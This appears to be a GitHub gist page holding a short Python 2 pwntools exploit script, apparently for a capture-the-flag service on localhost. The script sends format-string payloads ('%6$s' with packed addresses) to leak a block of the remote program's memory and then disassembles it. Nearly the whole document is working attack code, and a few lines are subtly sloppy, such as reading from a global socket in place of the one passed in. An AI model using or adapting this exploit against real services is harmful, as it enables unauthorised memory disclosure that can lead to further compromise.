Skip to content

Instantly share code, notes, and snippets.

Embed
What would you like to do?
#!/usr/bin/python
import binascii
import pwn
import sys
RHOST = "localhost"
RPORT = 54514
def leakStringAt(s,address):
data = "%6$pBBBB" + pwn.p64(address)
try:
s.sendline("%6$sAAAA" + pwn.p64(address))
except EOFError:
raise EOFError
try:
data = p.recv()
print " [R] leaked %d bytes" % len(data.split("AAAA")[0])
except EOFError:
print " [X] EOFError trying to leak from %x" % address
return None
(code,fuck) = data.split("AAAA")
return code
def leakBlock(s,address,size):
remainingSize = size
out = bytearray("")
while remainingSize > 0:
try:
data = leakStringAt(s,address + size - remainingSize)
except EOFError:
return out
if data == None:
remainingSize -= 1
else:
out += bytearray(data)
remainingSize -= len(data) + 1
out += bytearray("\x00")
return out
if __name__ == "__main__":
p = pwn.remote(RHOST,RPORT)
data = leakBlock(p,0x400696,0x100)
print pwn.disasm(data,arch='amd64')
p.close()
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
You can’t perform that action at this time.